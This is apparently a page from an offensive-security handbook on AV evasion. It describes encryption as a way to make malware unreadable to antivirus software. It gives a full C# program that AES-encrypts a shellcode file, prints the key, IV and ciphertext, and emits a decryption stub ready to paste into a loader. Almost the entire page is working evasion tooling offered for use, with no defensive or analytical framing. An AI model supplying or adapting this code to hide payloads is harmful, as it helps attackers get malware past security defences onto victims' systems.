Aes encryptor

Overview

Encryption can be used as a technique to bypass antivirus (AV) detection because it can make the malware code or payload unreadable to the antivirus software. When malware is encrypted, it appears as a scrambled set of data that the AV software may not be able to recognize as malicious code.

Code example

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

class Program
{
    static void Main(string[] args)
    {
        byte[] shellcode = File.ReadAllBytes(args[0]);

        byte[] key = new byte[32];
        byte[] iv = new byte[16];

        using (RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider())
        {
            rng.GetBytes(key);
            rng.GetBytes(iv);
        }

        byte[] encryptedBytes;
        using (Aes aesAlg = Aes.Create())
        {
            aesAlg.Key = key;
            aesAlg.IV = iv;
            aesAlg.Padding = PaddingMode.PKCS7;
            aesAlg.Mode = CipherMode.CBC;

            ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
            encryptedBytes = encryptor.TransformFinalBlock(shellcode, 0, shellcode.Length);
        }

        string encryptedBase64 = Convert.ToBase64String(encryptedBytes);

        // Decrypt Base64-encoded shellcode with AES
        byte[] decryptedBytes;
        using (Aes aesAlg = Aes.Create())
        {
            aesAlg.Key = key;
            aesAlg.IV = iv;
            aesAlg.Padding = PaddingMode.PKCS7;
            aesAlg.Mode = CipherMode.CBC;

            ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
            byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);
            decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);
        }

        string decryptedShellcode = Convert.ToBase64String(decryptedBytes);

        Console.WriteLine("[i] AES key and iv:\n");
        Console.WriteLine($"string key = \"{Convert.ToBase64String(key)}\";\nstring iv = \"{Convert.ToBase64String(iv)}\";");

        Console.WriteLine($"\n[i] Original shellcode:\n{Convert.ToBase64String(shellcode)}");
        Console.WriteLine($"\n[i] Encrypted shellcode:\n{encryptedBase64}");
        Console.WriteLine($"\n[i] Roundtrip shellcode:\n{decryptedShellcode}\n");

        Console.WriteLine($"byte[] decryptedBytes;\r\n        using (Aes aesAlg = Aes.Create())\r\n        {{\r\n            aesAlg.Key = Convert.FromBase64String(key);\r\n            aesAlg.IV = Convert.FromBase64String(iv);\r\n            aesAlg.Padding = PaddingMode.PKCS7;\r\n            aesAlg.Mode = CipherMode.CBC;\r\n\r\n            ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);\r\n            byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);\r\n            decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);\r\n        }}");

        Console.WriteLine("Press enter to continue ...");
        Console.ReadLine();
    }

}
PreviousEncryptorsNextSandbox evasion

Last updated